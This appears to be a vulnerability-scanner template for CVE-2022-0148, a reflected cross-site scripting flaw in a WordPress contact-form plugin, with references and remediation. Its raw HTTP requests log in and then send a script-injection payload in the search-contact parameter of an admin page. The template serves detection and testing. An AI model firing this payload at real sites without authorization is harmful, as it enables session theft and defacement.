id: CVE-2022-0148 info: name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements - https://nvd.nist.gov/vuln/detail/CVE-2022-0148 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00144 epss-percentile: 0.50222 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: premio product: mystickyelements framework: wordpress tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100b170ba0c6ad3af42bd6f70aa404652b0e6a8213f3e4f81a152225e137fb949fa022042b2e76073edf8be64e0c79747b2e2791f3b6172349bdfc3bce8a1420a03fbd2:922c64590222798bb761d5b6d8e72950